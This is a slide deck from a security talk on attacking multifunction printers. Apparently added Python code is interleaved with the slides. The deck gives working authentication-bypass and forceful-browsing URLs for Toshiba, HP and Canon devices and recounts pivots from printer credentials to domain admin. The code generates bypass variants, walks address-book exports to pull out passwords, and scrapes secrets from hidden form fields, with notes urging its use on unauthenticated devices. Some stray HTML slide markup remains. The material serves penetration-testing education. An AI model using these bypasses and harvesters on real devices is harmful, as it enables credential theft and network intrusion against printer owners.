Exploiting Vulnerabilities in Multifunction Printers

403 Labs consultant Pete Arzamendi discusses the possibilities of exploiting vulnerabilities in multifunction printers.

Exploiting vulnerabilities in Multifunction Printers
Pete Arzamendi
Consultant, 403 Labs, LLC

Introduction: Pete Arzamendi
- Consultant at 403 Labs
- Both a Qualified Security Assessor (QSA) and a Payment Application Qualified Security Assessor (PA-QSA) for the Payment Card Industry (PCI)
- Former packet monkey, with over 10 years of experience in the information technology field
- Worked with small and medium businesses and with local and state authorities on computer forensic cases and security assessments
- Hobbies include malware analysis and vulnerability research
- Member of the foofus.net team

Introduction: 403 Labs, LLC
- Full-service information security and compliance consulting firm headquartered in Milwaukee, with additional offices in Chicago and San Francisco
- Experts in the Payment Card Industry (PCI):
  - Qualified Security Assessor (QSA)
  - Payment Application Qualified Security Assessor (PA-QSA)
  - Approved Scanning Vendor (ASV)
  - PCI Forensics Investigator (PFI) (just approved, expect to be listed shortly)
- Penetration testing, including web applications
- Experienced in handling computer forensic investigations

Agenda
- History of printers
- MFP functions and features
- MFP flaws and vulnerabilities
- Leveraging MFPs during penetration testing
- Development of an automated harvesting tool, PRAEDA
- Q&A

Terms and jargon
- LDAP: The Lightweight Directory Access Protocol is an application protocol for reading and editing directories. A directory in this sense is an organized set of records: for example, a telephone directory is an alphabetical list of persons and organizations with an address and phone number in each "record".
- SMB: Server Message Block, mainly used to provide shared access to files, printers and serial ports, and miscellaneous communication between nodes on a network.
- SMTP: Simple Mail Transfer Protocol, the Internet standard for electronic mail (e-mail) transmission.
- AD: Active Directory is a directory service created by Microsoft. Active Directory allows administrators to assign policies and to deploy and update software. Active Directory networks range from a small installation with a few computers, users and printers to tens of thousands of users, many different network domains and large server farms spanning many geographical locations.

History of Multifunction Printers
- Gary Starkweather is credited with inventing the laser printer at Xerox in 1969
- 1987: the first multifunction printer/copier, the "Xerox Printer 100"
- March 1991: the HP LaserJet IIISi, the world's first networked printer
- The first true multifunction printer/fax/copier units were introduced in the early 1990s
In 2011 you really can't buy just a printer.
MFP functions and features

MFP functions and features
Looking for features and functions that can be leveraged to gain information that could in turn be used in attacking other systems:
- Email
  - Server settings
  - Address books
- Faxing
  - Contact info
  - User names
  - Address books

MFP functions and features
- Scanning
  - Windows authentication
  - System
  - Users
  - FTP authentication
- LDAP
  - Access credentials
- Logging
  - User names
- Remote retrieval of print, scan or fax jobs

Toshiba functions and features
[Screenshots of the Toshiba web interface over three slides; the annotated fields are Password, Network Path and Username]

Canon functions and features
[Screenshots of the Canon web interface over four slides]

HP functions and features
[Screenshots of the HP web interface over three slides; models shown: HP M4345, 9250, CM6040]
MFP flaws and vulnerabilities

MFP flaws and vulnerabilities: Security bypass
- Various brands and models suffer from a vulnerability allowing bypass of security authentication

Example: Toshiba e-STUDIO
  /TopAccess/Administrator/Setup/ScanToFile/List.htm    (authentication required)
  /TopAccess//Administrator/Setup/ScanToFile/List.htm   (an extra slash, and full access is allowed)

Example: Home/Office HP Officejet
  /index.htm?cat=info&page=faxAddrBook1          (authentication required)
  /index.htm?cat=info&page=page=faxAddrBook1     (an extra "page=", and full access is allowed)
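Both bypasses have the same root cause: the authentication check and the code that actually locates the resource parse the request differently, so a request can be crafted that the check does not recognise as protected but the loader still resolves to the protected page. The following is an added example, not the vendors' code or the presenter's: a hypothetical handler that models both behaviours (a `//` the file layer collapses, a duplicated `page=` the loader strips), the hardened version that canonicalises before the check and rejects ambiguous input, and a helper that generates the same two classes of mutation for a tester to try against other URLs. The ACL table and the loader quirk are assumptions made for the example.

```python
import posixpath
from urllib.parse import urlsplit, parse_qs

# Hypothetical ACL table modelled on the two slide URLs; not vendor code.
PROTECTED_PREFIXES = ("/TopAccess/Administrator/",)
PROTECTED_PAGES = {"faxAddrBook1"}


def _page_name(raw):
    """Page-loader quirk being modelled: keep only the text after the last '='."""
    return raw.rsplit("=", 1)[-1]


def serve_vulnerable(url, authenticated=False):
    """ACL decides on the raw request; the file/page layer then normalises it
    with different rules. Returns (status, resource)."""
    parts = urlsplit(url)
    # parse_qs splits on the first '=', so the bypass URL yields 'page=faxAddrBook1'
    page = parse_qs(parts.query).get("page", [""])[0]
    if not authenticated and (parts.path.startswith(PROTECTED_PREFIXES)
                              or page in PROTECTED_PAGES):
        return 401, None
    resource = posixpath.normpath(parts.path)      # collapses the extra '/'
    if page:
        resource += "#" + _page_name(page)         # recovers 'faxAddrBook1'
    return 200, resource


def serve_fixed(url, authenticated=False):
    """Canonicalise first, reject anything ambiguous, then run the ACL on
    exactly the resource that will be served."""
    parts = urlsplit(url)
    canonical = posixpath.normpath(parts.path)
    if canonical != parts.path:                    # '//', '/./', '/../' ...
        return 400, None
    pages = parse_qs(parts.query).get("page", [])
    page = pages[0] if pages else ""
    if len(pages) > 1 or "=" in page:              # duplicated or nested parameter
        return 400, None
    if not authenticated and (canonical.startswith(PROTECTED_PREFIXES)
                              or page in PROTECTED_PAGES):
        return 401, None
    return 200, canonical + ("#" + page if page else "")


def bypass_variants(url):
    """Mutations a tester would send, generalising the two slide examples:
    a doubled '/' at each inner path boundary and a duplicated '<name>=' on
    each query parameter."""
    parts = urlsplit(url)
    variants = []
    segs = parts.path.split("/")
    for i in range(2, len(segs)):                  # skip the leading '/' itself
        path = "/".join(segs[:i]) + "//" + "/".join(segs[i:])
        variants.append(parts._replace(path=path).geturl())
    pairs = parts.query.split("&") if parts.query else []
    for i, pair in enumerate(pairs):
        name = pair.split("=", 1)[0]
        mutated = pairs[:i] + [name + "=" + pair] + pairs[i + 1:]
        variants.append(parts._replace(query="&".join(mutated)).geturl())
    return variants
```

Against a real device you would send each `bypass_variants(url)` result with and without a session and diff the responses; a variant that returns the protected page unauthenticated is the finding. The fixed handler shows the defensive rule: normalise once, refuse any request whose normalised form differs from what was received, and run the ACL on exactly the object that will be served.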
MFP flaws and vulnerabilities: Forceful browsing
- Gain access to web pages and files by just knowing the correct URL path
- Typically a number of devices, printers and network appliances correctly secure files with the cgi, htm and html extensions but allow unauthenticated access to other file types

MFP flaws and vulnerabilities: Forceful browsing, Canon imageRUNNER
Export address books:
  http://target:8080/abook.ldif?AID=1&ACLS=1
- AID= can be incremented to download different address books
- ACLS=1 on imageRUNNER 3000 series
- ACLS=2 on imageRUNNER 4000 & 5000 series
- From the export you can extract:
  - User names
  - Possibly passwords
  - Accessible hosts

MFP flaws and vulnerabilities: Forceful browsing, Canon imageRUNNER
Export additional functions:
  http://target:8080/usermode.umd
- usermode.umd is a data file containing printer configuration data in plain text

MFP flaws and vulnerabilities: Information leak
A look at a few examples:
- Toshiba e-STUDIO
- Canon imageRUNNER
- HP MFP
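An exported address book is only useful once the credentials are pulled out of it. The block below is an added example covering the Canon abook.ldif export described above; it is not Praeda's or Canon's code. It builds the AID-incrementing export URLs the slide describes, parses LDIF (comment lines, folded continuation lines, `::` base64 values) and reports the entries that carry a password together with the user and host they belong to. The sample LDIF and its attribute names are constructed for the example; a real export follows the vendor's own schema, so the attribute lists are assumptions to adjust.

```python
import base64
import re

# Constructed LDIF in the shape of an MFP address-book export. The attribute
# names (uid, host, userPassword, ...) are assumptions for this example.
SAMPLE_LDIF = """\
# exported address book (constructed sample)
dn: cn=Accounts Payable,ou=addressbook
objectClass: person
cn: Accounts Payable
mail: ap@example.test

dn: cn=Scan Server,ou=addressbook
objectClass: person
cn: Scan Server
host: fileserver.example.test
uid: svc_scan
userPassword:: UGFzc3cwcmQh

dn: cn=Long Note,ou=addressbook
cn: Long Note
description: this value is folded across
  two lines in LDIF
"""

ATTR_RE = re.compile(r"^([A-Za-z][\w.;-]*)(::?) ?(.*)$")
SECRET_ATTRS = ("userpassword", "password", "passwd")
USER_ATTRS = ("uid", "samaccountname", "username", "cn")
HOST_ATTRS = ("host", "server", "ipaddress")


def export_urls(target, acls, max_aid=5, port=8080):
    """The requests to make when walking the address books: AID increments,
    ACLS depends on the imageRUNNER series (1 for 3000, 2 for 4000/5000)."""
    return ["http://%s:%d/abook.ldif?AID=%d&ACLS=%d" % (target, port, aid, acls)
            for aid in range(1, max_aid + 1)]


def parse_ldif(text):
    """Return a list of entries, each a dict of lower-cased attribute -> [values]."""
    lines = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:      # LDIF folding: leading space continues the previous line
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    entries, current = [], {}
    for line in lines + [""]:                  # trailing "" flushes the last entry
        if line.startswith("#"):
            continue
        if not line.strip():
            if current:
                entries.append(current)
                current = {}
            continue
        m = ATTR_RE.match(line)
        if not m:
            continue
        name, sep, value = m.groups()
        if sep == "::":                        # base64-encoded value
            value = base64.b64decode(value).decode("utf-8", "replace")
        current.setdefault(name.lower(), []).append(value)
    return entries


def harvest_credentials(entries):
    """Keep only entries that carry a secret, paired with user and host if present."""
    found = []
    for e in entries:
        secrets = [v for a in SECRET_ATTRS for v in e.get(a, [])]
        if not secrets:
            continue
        user = next((e[a][0] for a in USER_ATTRS if a in e), None)
        host = next((e[a][0] for a in HOST_ATTRS if a in e), None)
        found.append({"dn": e["dn"][0], "user": user, "password": secrets[0], "host": host})
    return found
```

The base64 branch matters in practice: a masked value is often exported as `attr:: ...` because LDIF requires base64 for anything non-printable, so an extractor that only handles `attr: value` walks straight past the password.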
  69. 69. HP MFP</li></li></ul><li>MFP flaws and vulnerabilities<br />Toshiba Information Leak <br />Just because the web form shows ●●●●●●●● <br />doesn’t mean it’s truly hidden<br />Not uncommon to find data viewable within <br />the web source as plain text<br />
  70. 70. MFP flaws and vulnerabilities<br />CanonInformation Leak<br />Want to bet this is also viewable in the source?<br />Although not directly found in the Password: value field, <br />it was still found within a hidden input tag <br />
  71. 71. MFP flaws and vulnerabilities<br />HP Information Leak<br />value=“ayz123”<br />Once again just need to examine the property<br />of the password field<br />
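All three leaks are the same pattern: the management page renders the stored secret into the `value` attribute of a password field or a hidden input, and the browser's masking is the only thing hiding it. As an added example that is not part of the presentation, the parser below walks a page with the standard-library HTML parser and reports every password-type input that carries a value, plus every hidden input whose name looks credential-related. The form markup is constructed for the example; `ayz123` is the value shown on the slide, the field names are assumptions.

```python
from html.parser import HTMLParser

# Constructed settings form in the style of an MFP web UI. The masked password
# field still carries its value, and a hidden input holds a second credential.
SAMPLE_FORM = """
<form action="/save" method="post">
  <input type="text" name="smtp_server" value="mail.example.test">
  <input type="text" name="smtp_user" value="mfp-scan">
  <input type="password" name="smtp_password" value="ayz123">
  <input type="hidden" name="ldap_bind_pwd" value="S3cret!">
  <input type="hidden" name="csrf_token" value="abc123">
  <input type="password" name="confirm_password" value="">
</form>
"""

# Name fragments that mark a hidden input as credential-bearing (assumption).
SECRET_HINTS = ("pass", "pwd", "secret", "key", "cred")


class LeakedFieldFinder(HTMLParser):
    """Collect <input> elements whose value the server should never have echoed."""

    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag != "input":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        itype = a.get("type", "text").lower()
        name = (a.get("name") or a.get("id") or "").lower()
        value = a.get("value", "")
        if not value:                       # an empty confirm field is fine
            return
        if itype == "password" or (itype == "hidden" and any(h in name for h in SECRET_HINTS)):
            self.hits.append({"type": itype, "name": name, "value": value})


def find_leaked_fields(html):
    """Return the credential-bearing inputs found in a page, in document order."""
    finder = LeakedFieldFinder()
    finder.feed(html)
    finder.close()
    return finder.hits
```

Run this over every authenticated settings page you can reach (and, given the bypasses earlier, the unauthenticated ones too); a `type="password"` field with a non-empty `value` is a finding regardless of what the browser displays.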
What the bad guys are doing: leveraging MFP vulnerabilities

Leveraging MFPs during penetration testing: HP to domain admin
- HP Color LaserJet CP4025
- Extract users' names from the color job log
- User with a weak password
- Access to workstations
- Domain admin token

Leveraging MFPs during penetration testing: Toshiba to payroll
- Toshiba e-STUDIO
- Extract password from the scan-to-file function
- Gain access to the AD domain
- Gain access to a number of folders/files/shares
- Access to one special file share, "Payroll backup"

Leveraging MFPs during penetration testing: Canon to domain controller
- Canon imageRUNNER
- Extract LDAP settings
- Enumerate domain user info
- Remote Desktop access to all servers

Leveraging MFPs during penetration testing: Fax to pwned
- OfficeBridge fax system
- First device we found credentials stored on; this is what got this project started
- Extract password from LDAP settings
- Account was a domain admin account

01/27/11
Automating the process

Automated harvesting: Praeda
What is Praeda?
- Latin for robber, plunderer
- A tool for the purpose of gathering information from network appliances through their web management interfaces
  - Printers
  - Network appliances
- Beta version written in Perl
- Goal was to create a simple tool that was modular

Automated harvesting: Praeda
[Screenshot of Praeda running]
Automated harvesting: Praeda
Data file structure (one pipe-separated record per device fingerprint):
P000005|HP Color LaserJet CP3525 Printers|HP-ChaiSOE/1.0|MP0002
P000006|HP Color LaserJet CP3505 Printers|HP-ChaiSOE/1.0|MP0002|
P000007||Canon Http Server 2.10|MP0003|MP0004|MP0005
P000008||Canon Http Server 2.11|MP0003|MP0004|MP0005
P000009|Home - Phaser 7750GX|Allegro-Software-RomPager/4.10|MP0006
P000010|Unauthorized|Spyglass_MicroServer/2.01FC1|MP0006
P000011|Principal|Spyglass_MicroServer/2.01FC1|MP0006
P000012|Home|Spyglass_MicroServer/2.01FC1|MP0006
P000013|Home - Phaser 6360DT|Allegro-Software-RomPager/4.34|MP0006
P000014|TopAccess|TOSHIBA TEC CORPORATION|MP0007
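The record format is not documented on the slide beyond the sample lines, so the reader below is an added example and not Praeda's own code. It assumes the fields are: record id, expected page title (blank meaning any title), expected HTTP `Server` header, and one or more module ids, with an empty trailing field ignored. `match_modules` applies a fingerprint the way the deck describes device identification (title page plus server type), and `extract_title` pulls the title out of a fetched page. The data lines are the ones from the slide.

```python
import re

# The fingerprint records shown on the slide, used here as the sample data file.
DATAFILE = """\
P000005|HP Color LaserJet CP3525 Printers|HP-ChaiSOE/1.0|MP0002
P000006|HP Color LaserJet CP3505 Printers|HP-ChaiSOE/1.0|MP0002|
P000007||Canon Http Server 2.10|MP0003|MP0004|MP0005
P000008||Canon Http Server 2.11|MP0003|MP0004|MP0005
P000009|Home - Phaser 7750GX|Allegro-Software-RomPager/4.10|MP0006
P000010|Unauthorized|Spyglass_MicroServer/2.01FC1|MP0006
P000011|Principal|Spyglass_MicroServer/2.01FC1|MP0006
P000012|Home|Spyglass_MicroServer/2.01FC1|MP0006
P000013|Home - Phaser 6360DT|Allegro-Software-RomPager/4.34|MP0006
P000014|TopAccess|TOSHIBA TEC CORPORATION|MP0007
"""

TITLE_RE = re.compile(r"<title[^>]*>(.*?)</title>", re.IGNORECASE | re.DOTALL)


def load_fingerprints(text):
    """Parse 'id|title|server|module[|module...]' records (field meaning assumed)."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = [f.strip() for f in line.split("|")]
        if len(fields) < 4:
            raise ValueError("malformed record: %r" % line)
        rec_id, title, server = fields[:3]
        modules = [m for m in fields[3:] if m]     # tolerate a trailing '|'
        records.append({"id": rec_id, "title": title, "server": server, "modules": modules})
    return records


def extract_title(html):
    """Title of a fetched management page, or '' if it has none."""
    m = TITLE_RE.search(html)
    return m.group(1).strip() if m else ""


def match_modules(records, page_title, server_header):
    """Module ids for the first record whose Server header matches and whose
    title either matches or is blank (wildcard). Empty list when unknown."""
    for rec in records:
        if rec["server"].lower() != server_header.strip().lower():
            continue
        if rec["title"] and rec["title"].lower() != page_title.strip().lower():
            continue
        return rec["modules"]
    return []
```

Matching on the `Server` header first is cheap and usually decisive; the title disambiguates families that share an embedded web server (the Spyglass and Allegro RomPager entries above), and a blank title lets one record cover every page of a device such as the Canon entries.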
Automated harvesting: Praeda
- We presently enumerate data from a dozen or more different printer types/versions
- Plan is to grow this to cover as many printers as we can find
- Looking for other simple methods for identifying printer types; the present process involves querying the web interface for:
  - Title page
  - Server type
- Researching encryption methods used by some vendors for backup and clone process outputs
  - HP
  - Xerox
- Looking into migrating the code to Ruby; early stages of conversion started

Questions about Praeda
Pete Arzamendi, bokojan@foofus.net
Deral Heiland, percX@foofus.net
Beta version of Praeda available at www.foofus.net

Contact Information
Pete Arzamendi
Consultant
403 Labs, LLC
parzamendi@403labs.com
877.403.LABS
www.403labs.com
